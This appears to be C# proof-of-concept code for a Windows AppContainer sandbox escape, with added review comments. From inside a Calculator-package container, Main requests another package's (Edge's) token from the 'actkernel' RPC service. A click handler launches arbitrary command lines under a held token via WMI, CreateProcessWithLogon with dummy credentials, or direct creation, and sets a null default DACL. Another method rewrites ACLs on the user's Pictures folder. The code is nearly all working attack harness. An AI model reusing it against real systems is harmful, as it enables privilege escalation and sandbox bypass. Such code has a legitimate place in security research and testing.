/// <summary>
/// Entry point of a two-stage console harness. Outside an AppContainer it relaunches a
/// copy of the program inside one and waits for it; inside the AppContainer it connects
/// to the "actkernel" endpoint and requests a token through <c>PrivGetPsmToken</c>,
/// then prints what came back.
/// </summary>
/// <param name="args">
/// Command-line arguments. When the process is not in an AppContainer, any argument is
/// rejected with "Already started". The relaunched copy is started with "run abc", so
/// this presumably stops a copy that failed to enter the container from relaunching again.
/// </param>
static void Main(string[] args)
{
    try
    {
        if (IsInAppContainer())
        {
            Console.WriteLine("In AC");
            Console.WriteLine("idiot");

            // Activate an out-of-process (LOCAL_SERVER) COM class before connecting. The
            // original comment says this is done to spawn the server process so it can
            // initialise. The interface requested is IUnknown.
            Guid serverClsid = new Guid("ce0e0be8-cf56-4577-9577-34cc96ac087c");
            Guid unknownIid = new Guid("00000000-0000-0000-c000-000000000046");
            CoCreateInstance(ref serverClsid, IntPtr.Zero, CLSCTX.LOCAL_SERVER, ref unknownIid);

            using (var rpcClient = new Client())
            {
                rpcClient.Connect("actkernel");

                // NOTE(review): the package names passed here (Microsoft Edge) differ from
                // the package SID this process was launched under (Windows Calculator).
                // Whether the server authorises the caller for the requested package is
                // not visible from this file. Confirm on the service side.
                uint status = rpcClient.PrivGetPsmToken(
                    0x40000001,
                    0,
                    "Microsoft.MicrosoftEdge_44.18362.1.0_neutral__8wekyb3d8bbwe",
                    "Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge",
                    out NtToken token,
                    out int _);

                // A non-zero result is surfaced as a Win32-style exception.
                if (status != 0)
                {
                    throw new SafeWin32Exception((int)status);
                }

                using (token)
                {
                    Console.WriteLine("{0} - Handle: {1:X}", token, token.Handle.DangerousGetHandle().ToInt32());
                    Console.WriteLine("Package Sid: {0}", token.AppContainerSid.Name);
                    Console.WriteLine("AppId: {0}", token.PackageFullName);

                    // Hold the token open until the operator presses Enter.
                    Console.ReadLine();
                }
            }
        }
        else
        {
            // First stage: refuse to relaunch if we were already started with arguments.
            if (args.Length > 0)
            {
                throw new ArgumentException("Already started");
            }

            // Launch the copy returned by CopyToTempDir() in a new console, inside the
            // AppContainer whose SID is derived from the Windows Calculator package family name.
            Win32ProcessConfig launchConfig = new Win32ProcessConfig
            {
                ApplicationName = CopyToTempDir(),
                CommandLine = "run abc",
                AppContainerSid = TokenUtils.DerivePackageSidFromName("microsoft.windowscalculator_8wekyb3d8bbwe"),
                CreationFlags = CreateProcessFlags.NewConsole
            };

            using (var child = Win32Process.CreateProcess(launchConfig))
            {
                child.Process.Wait();
            }
        }
    }
    catch (Exception ex)
    {
        // Print any failure and keep the console open so it can be read.
        Console.WriteLine(ex);
        Console.ReadLine();
    }
}
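/// <summary>
/// Click handler that starts the command line typed into <c>txtCommandLine</c> using the
/// token held in <c>_token</c>. Depending on the check boxes the process is created via
/// WMI (<c>Win32_Process.Create</c>) while impersonating the token, via
/// <c>CreateProcessWithLogon</c> while impersonating the token, or directly through
/// <c>CreateProcessForToken</c>.
/// </summary>
/// <param name="sender">Event source (unused).</param>
/// <param name="e">Event data (unused).</param>
/// <remarks>
/// Any exception, including a non-zero WMI return value, is shown in an error dialog.
/// </remarks>
private void btnCreateProcess_Click(object sender, EventArgs e)
{
    try
    {
        if (checkBoxUseWmi.Checked || checkBoxUseNetLogon.Checked)
        {
            // Both indirect paths run under an impersonation-level duplicate of the token.
            using (var token = _token.DuplicateToken(TokenType.Impersonation, SecurityImpersonationLevel.Impersonation, TokenAccessRights.MaximumAllowed))
            {
                // NOTE(review): this replaces the duplicate's default DACL with one built from
                // a null pointer. That presumably means objects created while impersonating get
                // no DACL protection by default. Confirm this is intended and limited to the
                // duplicate rather than the original token.
                token.SetDefaultDacl(new Acl(IntPtr.Zero, false));

                using (var imp = token.Impersonate())
                {
                    if (checkBoxUseWmi.Checked)
                    {
                        using (var managementClass = new ManagementClass(@"\\.\root\cimv2", "Win32_Process", new ObjectGetOptions()))
                        using (var inputParams = managementClass.GetMethodParameters("Create"))
                        {
                            inputParams["CommandLine"] = txtCommandLine.Text;

                            // Win32_Process.Create reports failure through its ReturnValue
                            // out-parameter rather than by throwing, so check it explicitly
                            // instead of silently dropping the result.
                            using (var outParams = managementClass.InvokeMethod("Create", inputParams, new InvokeMethodOptions()))
                            {
                                if (outParams != null)
                                {
                                    uint returnValue = Convert.ToUInt32(outParams["ReturnValue"]);
                                    if (returnValue != 0)
                                    {
                                        throw new InvalidOperationException(
                                            string.Format("Win32_Process.Create failed with return value {0}", returnValue));
                                    }
                                }
                            }
                        }
                    }
                    else
                    {
                        var config = new Win32ProcessConfig
                        {
                            CommandLine = txtCommandLine.Text,
                            Desktop = @"WinSta0\Default"
                        };

                        // The three "abc" strings are placeholder credential arguments. With
                        // NetCredentialsOnly they are presumably not validated for the local
                        // logon, so the new process runs with the impersonated identity.
                        // Confirm against the CreateProcessWithLogon wrapper.
                        using (Win32Process.CreateProcessWithLogon("abc", "abc", "abc",
                            CreateProcessLogonFlags.NetCredentialsOnly | CreateProcessLogonFlags.WithProfile, config))
                        {
                            // Nothing to do with the process object; dispose it immediately.
                        }
                    }
                }
            }
        }
        else
        {
            // Direct path: create the process from the token itself.
            using (CreateProcessForToken(txtCommandLine.Text, _token, checkBoxMakeInteractive.Checked))
            {
            }
        }
    }
    catch (Exception ex)
    {
        MessageBox.Show(this, ex.Message, "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
    }
}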
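/// <summary>
/// Relaunches <c>mainExe</c> inside an AppContainer and waits for it to exit. The child is
/// started in the user's Pictures folder with network and pictures-library capabilities,
/// and receives the path of a placeholder file ("1.txt" in Pictures) as its argument.
/// </summary>
/// <param name="args">Unused by this method.</param>
/// <returns>Always <c>true</c>.</returns>
static bool RestartInAppContainer(string[] args)
{
    string picturesDir = Environment.GetFolderPath(Environment.SpecialFolder.MyPictures);

    // Make sure the placeholder file handed to the child exists.
    string fakeFile = Path.Combine(picturesDir, "1.txt");
    if (!File.Exists(fakeFile))
    {
        File.WriteAllText(fakeFile, "fake");
    }

    // NOTE(review): FixSecurity is defined elsewhere. It is presumably changing the ACLs on
    // the program directory and on the Pictures folder so the AppContainer process can
    // reach them. Confirm exactly what it grants and whether the change is ever reverted,
    // since it is applied to a real user folder.
    FixSecurity(Path.GetDirectoryName(typeof(Program).Assembly.Location));
    FixSecurity(picturesDir);

    List<Sid> caps = new List<Sid>
    {
        KnownSids.CapabilityInternetClient,
        KnownSids.CapabilityInternetClientServer,
        KnownSids.CapabilityPrivateNetworkClientServer,
        KnownSids.CapabilityPicturesLibrary
    };

    Win32ProcessConfig config = new Win32ProcessConfig
    {
        CreationFlags = CreateProcessFlags.NewConsole,
        CurrentDirectory = picturesDir,
        ApplicationName = mainExe,
        // Quote both paths: profile and install paths commonly contain spaces, and an
        // unquoted command line would be split into the wrong arguments by the child.
        CommandLine = string.Format("\"{0}\" \"{1}\"", mainExe, fakeFile)
    };

    // The container SID is derived from the Windows Calculator package family name.
    config.SetAppContainerSidFromName("microsoft.windowscalculator_8wekyb3d8bbwe");
    config.Capabilities.AddRange(caps);

    using (var p = Win32Process.CreateProcess(config))
    {
        p.Process.Wait();
    }

    return true;
}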